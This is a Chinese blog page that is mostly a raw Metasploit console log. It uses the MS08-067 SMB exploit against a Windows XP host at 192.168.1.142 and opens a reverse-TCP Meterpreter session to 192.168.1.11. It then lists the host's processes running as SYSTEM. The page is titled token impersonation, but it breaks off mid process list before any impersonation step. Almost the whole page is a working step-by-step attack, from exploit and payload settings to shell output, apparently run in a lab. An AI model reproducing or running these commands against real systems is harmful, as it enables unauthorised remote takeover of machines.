程序博客网 > 网络数据挖掘

metasploit的令牌假冒攻击

来源:互联网 发布:网络数据挖掘 编辑:程序博客网 时间:2024/04/19 19:26
root@bt:~# msfconsole NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"NOTICE:  CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"NOTICE:  CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"NOTICE:  CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"NOTICE:  CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"NOTICE:  CREATE TABLE will create implicit sequence "notes_id_seq" for serial column "notes.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "notes_pkey" for table "notes"NOTICE:  CREATE TABLE will create implicit sequence "wmap_targets_id_seq" for serial column "wmap_targets.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_targets_pkey" for table "wmap_targets"NOTICE:  CREATE TABLE will create implicit sequence "wmap_requests_id_seq" for serial column "wmap_requests.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_requests_pkey" for table "wmap_requests"NOTICE:  CREATE TABLE will create implicit sequence "workspaces_id_seq" for serial column "workspaces.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "workspaces_pkey" for table "workspaces"NOTICE:  CREATE TABLE will create implicit sequence "events_id_seq" for serial column "events.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "events_pkey" for table "events"NOTICE:  CREATE TABLE will create implicit sequence "loots_id_seq" for serial column "loots.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "loots_pkey" for table "loots"NOTICE:  CREATE TABLE will create implicit sequence "users_id_seq" for serial column "users.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "users_pkey" for table "users"NOTICE:  CREATE TABLE will create implicit sequence "reports_id_seq" for serial column "reports.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "reports_pkey" for table "reports"NOTICE:  CREATE TABLE will create implicit sequence "tasks_id_seq" for serial column "tasks.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tasks_pkey" for table "tasks"NOTICE:  CREATE TABLE will create implicit sequence "creds_id_seq" for serial column "creds.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "creds_pkey" for table "creds"NOTICE:  CREATE TABLE will create implicit sequence "exploited_hosts_id_seq" for serial column "exploited_hosts.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploited_hosts_pkey" for table "exploited_hosts"NOTICE:  CREATE TABLE will create implicit sequence "report_templates_id_seq" for serial column "report_templates.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "report_templates_pkey" for table "report_templates"NOTICE:  CREATE TABLE will create implicit sequence "campaigns_id_seq" for serial column "campaigns.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "campaigns_pkey" for table "campaigns"NOTICE:  CREATE TABLE will create implicit sequence "email_templates_id_seq" for serial column "email_templates.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_templates_pkey" for table "email_templates"NOTICE:  CREATE TABLE will create implicit sequence "attachments_id_seq" for serial column "attachments.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "attachments_pkey" for table "attachments"NOTICE:  CREATE TABLE will create implicit sequence "email_addresses_id_seq" for serial column "email_addresses.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_addresses_pkey" for table "email_addresses"NOTICE:  CREATE TABLE will create implicit sequence "web_templates_id_seq" for serial column "web_templates.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_templates_pkey" for table "web_templates"NOTICE:  CREATE TABLE will create implicit sequence "web_sites_id_seq" for serial column "web_sites.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_sites_pkey" for table "web_sites"NOTICE:  CREATE TABLE will create implicit sequence "web_pages_id_seq" for serial column "web_pages.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_pages_pkey" for table "web_pages"NOTICE:  CREATE TABLE will create implicit sequence "web_forms_id_seq" for serial column "web_forms.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_forms_pkey" for table "web_forms"NOTICE:  CREATE TABLE will create implicit sequence "web_vulns_id_seq" for serial column "web_vulns.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_vulns_pkey" for table "web_vulns"NOTICE:  CREATE TABLE will create implicit sequence "imported_creds_id_seq" for serial column "imported_creds.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "imported_creds_pkey" for table "imported_creds"NOTICE:  CREATE TABLE will create implicit sequence "tags_id_seq" for serial column "tags.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tags_pkey" for table "tags"NOTICE:  CREATE TABLE will create implicit sequence "sessions_id_seq" for serial column "sessions.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "sessions_pkey" for table "sessions"NOTICE:  CREATE TABLE will create implicit sequence "session_events_id_seq" for serial column "session_events.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "session_events_pkey" for table "session_events"NOTICE:  CREATE TABLE will create implicit sequence "routes_id_seq" for serial column "routes.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "routes_pkey" for table "routes"NOTICE:  CREATE TABLE will create implicit sequence "api_keys_id_seq" for serial column "api_keys.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "api_keys_pkey" for table "api_keys"NOTICE:  CREATE TABLE will create implicit sequence "macros_id_seq" for serial column "macros.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "macros_pkey" for table "macros"NOTICE:  CREATE TABLE will create implicit sequence "cred_files_id_seq" for serial column "cred_files.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "cred_files_pkey" for table "cred_files"NOTICE:  CREATE TABLE will create implicit sequence "listeners_id_seq" for serial column "listeners.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "listeners_pkey" for table "listeners"NOTICE:  CREATE TABLE will create implicit sequence "nexpose_consoles_id_seq" for serial column "nexpose_consoles.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "nexpose_consoles_pkey" for table "nexpose_consoles"NOTICE:  CREATE TABLE will create implicit sequence "profiles_id_seq" for serial column "profiles.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "profiles_pkey" for table "profiles"NOTICE:  CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial column "mod_refs.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey" for table "mod_refs"NOTICE:  CREATE TABLE will create implicit sequence "vuln_details_id_seq" for serial column "vuln_details.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vuln_details_pkey" for table "vuln_details"NOTICE:  CREATE TABLE will create implicit sequence "host_details_id_seq" for serial column "host_details.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "host_details_pkey" for table "host_details"NOTICE:  CREATE TABLE will create implicit sequence "vuln_attempts_id_seq" for serial column "vuln_attempts.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vuln_attempts_pkey" for table "vuln_attempts"NOTICE:  CREATE TABLE will create implicit sequence "module_details_id_seq" for serial column "module_details.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_details_pkey" for table "module_details"NOTICE:  CREATE TABLE will create implicit sequence "module_authors_id_seq" for serial column "module_authors.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_authors_pkey" for table "module_authors"NOTICE:  CREATE TABLE will create implicit sequence "module_mixins_id_seq" for serial column "module_mixins.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_mixins_pkey" for table "module_mixins"NOTICE:  CREATE TABLE will create implicit sequence "module_targets_id_seq" for serial column "module_targets.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_targets_pkey" for table "module_targets"NOTICE:  CREATE TABLE will create implicit sequence "module_actions_id_seq" for serial column "module_actions.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_actions_pkey" for table "module_actions"NOTICE:  CREATE TABLE will create implicit sequence "module_refs_id_seq" for serial column "module_refs.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_refs_pkey" for table "module_refs"NOTICE:  CREATE TABLE will create implicit sequence "module_archs_id_seq" for serial column "module_archs.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_archs_pkey" for table "module_archs"NOTICE:  CREATE TABLE will create implicit sequence "module_platforms_id_seq" for serial column "module_platforms.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_platforms_pkey" for table "module_platforms"NOTICE:  CREATE TABLE will create implicit sequence "exploit_attempts_id_seq" for serial column "exploit_attempts.id"NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploit_attempts_pkey" for table "exploit_attempts"[*] The initial module cache will be built in the background, this can take 2-5 minutes...                 _---------.             .' #######   ;."  .---,.    ;@             @@`;   .---,..." @@@@@'.,'@@            @@@@@',.'@@@@ ".'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'     "--'.@@@  -.@        @ ,'-   .'--"          ".@' ; @       @ `.  ;'            |@@@@ @@@     @    .             ' @@@ @@   @@    ,              `.@@@@    @@   .                ',@@     @   ;           _____________                 (   3 C    )     /|___ / Metasploit! \                 ;@'. __*__,."    \|--- \_____________/                  '(.,...."/       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --=[ 927 exploits - 499 auxiliary - 151 post+ -- --=[ 251 payloads - 28 encoders - 8 nopsmsf > search ms08_067_netapi[-] Warning: database not connected or cache not built, falling back to slow searchMatching Modules================   Name                                 Disclosure Date  Rank   Description   ----                                 ---------------  ----   -----------   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruptionmsf > use exploit/windows/smb/ms08_067_netapimsf  exploit(ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   RHOST                     yes       The target address   RPORT    445              yes       Set the SMB service port   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)Exploit target:   Id  Name   --  ----   0   Automatic Targetingmsf  exploit(ms08_067_netapi) > set RHOST 192.168.1.142RHOST => 192.168.1.142msf  exploit(ms08_067_netapi) > show payloadsCompatible Payloads===================   Name                                             Disclosure Date  Rank    Description   ----                                             ---------------  ----    -----------   generic/custom                                                    normal  Custom Payload   generic/debug_trap                                                normal  Generic x86 Debug Trap   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline   generic/tight_loop                                                normal  Generic x86 Tight Loop   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (IPv6)   windows/dllinject/bind_nonx_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)   windows/dllinject/bind_tcp                                        normal  Reflective DLL Injection, Bind TCP Stager   windows/dllinject/reverse_http                                    normal  Reflective DLL Injection, Reverse HTTP Stager   windows/dllinject/reverse_ipv6_http                               normal  Reflective DLL Injection, Reverse HTTP Stager (IPv6)   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)   windows/dllinject/reverse_nonx_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)   windows/dllinject/reverse_ord_tcp                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)   windows/dllinject/reverse_tcp                                     normal  Reflective DLL Injection, Reverse TCP Stager   windows/dllinject/reverse_tcp_allports                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager   windows/dllinject/reverse_tcp_dns                                 normal  Reflective DLL Injection, Reverse TCP Stager (DNS)   windows/dns_txt_query_exec                                        normal  DNS TXT Record Payload Download and Execution   windows/exec                                                      normal  Windows Execute Command   windows/loadlibrary                                               normal  Windows LoadLibrary Path   windows/messagebox                                                normal  Windows MessageBox   windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)   windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)   windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager   windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager   windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager   windows/meterpreter/reverse_ipv6_http                             normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)   windows/meterpreter/reverse_ipv6_https                            normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)   windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)   windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)   windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)   windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager   windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager   windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)   windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP   windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline   windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)   windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)   windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager   windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)   windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)   windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)   windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager   windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager   windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)   windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)   windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)   windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager   windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)   windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)   windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)   windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager   windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager   windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)   windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)   windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager   windows/shell/reverse_http                                        normal  Windows Command Shell, Reverse HTTP Stager   windows/shell/reverse_ipv6_http                                   normal  Windows Command Shell, Reverse HTTP Stager (IPv6)   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)   windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)   windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)   windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager   windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager   windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)   windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline   windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline   windows/speak_pwned                                               normal  Windows Speech API - Say "You Got Pwned!"   windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)   windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)   windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager   windows/upexec/reverse_http                                       normal  Windows Upload/Execute, Reverse HTTP Stager   windows/upexec/reverse_ipv6_http                                  normal  Windows Upload/Execute, Reverse HTTP Stager (IPv6)   windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)   windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)   windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)   windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager   windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager   windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)   windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)   windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)   windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager   windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), Reverse HTTP Stager   windows/vncinject/reverse_ipv6_http                               normal  VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)   windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)   windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)   windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)   windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager   windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager   windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf  exploit(ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   RHOST    192.168.1.142    yes       The target address   RPORT    445              yes       Set the SMB service port   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none   LHOST                      yes       The listen address   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Automatic Targetingmsf  exploit(ms08_067_netapi) > set LHOST 192.168.1.11LHOST => 192.168.1.11msf  exploit(ms08_067_netapi) > show targetsExploit targets:   Id  Name   --  ----   0   Automatic Targeting   1   Windows 2000 Universal   2   Windows XP SP0/SP1 Universal   3   Windows XP SP2 English (AlwaysOn NX)   4   Windows XP SP2 English (NX)   5   Windows XP SP3 English (AlwaysOn NX)   6   Windows XP SP3 English (NX)   7   Windows 2003 SP0 Universal   8   Windows 2003 SP1 English (NO NX)   9   Windows 2003 SP1 English (NX)   10  Windows 2003 SP1 Japanese (NO NX)   11  Windows 2003 SP2 English (NO NX)   12  Windows 2003 SP2 English (NX)   13  Windows 2003 SP2 German (NO NX)   14  Windows 2003 SP2 German (NX)   15  Windows XP SP2 Arabic (NX)   16  Windows XP SP2 Chinese - Traditional / Taiwan (NX)   17  Windows XP SP2 Chinese - Simplified (NX)   18  Windows XP SP2 Chinese - Traditional (NX)   19  Windows XP SP2 Czech (NX)   20  Windows XP SP2 Danish (NX)   21  Windows XP SP2 German (NX)   22  Windows XP SP2 Greek (NX)   23  Windows XP SP2 Spanish (NX)   24  Windows XP SP2 Finnish (NX)   25  Windows XP SP2 French (NX)   26  Windows XP SP2 Hebrew (NX)   27  Windows XP SP2 Hungarian (NX)   28  Windows XP SP2 Italian (NX)   29  Windows XP SP2 Japanese (NX)   30  Windows XP SP2 Korean (NX)   31  Windows XP SP2 Dutch (NX)   32  Windows XP SP2 Norwegian (NX)   33  Windows XP SP2 Polish (NX)   34  Windows XP SP2 Portuguese - Brazilian (NX)   35  Windows XP SP2 Portuguese (NX)   36  Windows XP SP2 Russian (NX)   37  Windows XP SP2 Swedish (NX)   38  Windows XP SP2 Turkish (NX)   39  Windows XP SP3 Arabic (NX)   40  Windows XP SP3 Chinese - Traditional / Taiwan (NX)   41  Windows XP SP3 Chinese - Simplified (NX)   42  Windows XP SP3 Chinese - Traditional (NX)   43  Windows XP SP3 Czech (NX)   44  Windows XP SP3 Danish (NX)   45  Windows XP SP3 German (NX)   46  Windows XP SP3 Greek (NX)   47  Windows XP SP3 Spanish (NX)   48  Windows XP SP3 Finnish (NX)   49  Windows XP SP3 French (NX)   50  Windows XP SP3 Hebrew (NX)   51  Windows XP SP3 Hungarian (NX)   52  Windows XP SP3 Italian (NX)   53  Windows XP SP3 Japanese (NX)   54  Windows XP SP3 Korean (NX)   55  Windows XP SP3 Dutch (NX)   56  Windows XP SP3 Norwegian (NX)   57  Windows XP SP3 Polish (NX)   58  Windows XP SP3 Portuguese - Brazilian (NX)   59  Windows XP SP3 Portuguese (NX)   60  Windows XP SP3 Russian (NX)   61  Windows XP SP3 Swedish (NX)   62  Windows XP SP3 Turkish (NX)   63  Windows 2003 SP2 Japanese (NO NX)msf  exploit(ms08_067_netapi) > set TARGET 41TARGET => 41msf  exploit(ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   RHOST    192.168.1.142    yes       The target address   RPORT    445              yes       Set the SMB service port   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none   LHOST     192.168.1.11     yes       The listen address   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   41  Windows XP SP3 Chinese - Simplified (NX)msf  exploit(ms08_067_netapi) > exploit[*] Started reverse handler on 192.168.1.11:4444 [*] Attempting to trigger the vulnerability...[*] Sending stage (752128 bytes) to 192.168.1.142[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.142:1063) at 2013-04-25 17:49:30 -0400meterpreter > psProcess List============ PID   PPID  Name               Arch  Session     User                           Path ---   ----  ----               ----  -------     ----                           ---- 0     0     [System Process]         4294967295                                  4     0     System             x86   0           NT AUTHORITY\SYSTEM             172   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe 448   660   logon.scr          x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\System32\logon.scr 492   704   VMwareService.exe  x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\VMwareService.exe 588   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe 636   588   csrss.exe          x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe 660   588   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe 704   660   services.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe 716   660   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe 872   704   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe 888   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe 968   704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe 1072  1092  notepad.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe 1080  1092  notepad.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe 1092  704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe 1144  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe 1180  704   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe 1480  1444  explorer.exe       x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\Explorer.EXE 1496  1456  conime.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\conime.exe 1580  704   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe 1728  704   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe 1852  1480  VMwareTray.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe 1860  1480  VMwareUser.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareUser.exe 1888  1480  ctfmon.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\ctfmon.exe 1956  1092  wscntfy.exe        x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\wscntfy.exemeterpreter > 


meterpreter > psProcess List============ PID   PPID  Name               Arch  Session     User                           Path ---   ----  ----               ----  -------     ----                           ---- 0     0     [System Process]         4294967295                                  4     0     System             x86   0           NT AUTHORITY\SYSTEM             172   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe 492   704   VMwareService.exe  x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\VMwareService.exe 588   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe 632   1480  cmd.exe            x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\cmd.exe 636   588   csrss.exe          x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe 660   588   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe 704   660   services.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe 716   660   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe 872   704   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe 888   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe 968   704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe 1072  1092  notepad.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe 1080  1092  notepad.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe 1092  704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe 1144  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe 1180  704   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe 1480  1444  explorer.exe       x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\Explorer.EXE 1496  1456  conime.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\conime.exe 1580  704   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe 1728  704   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe 1852 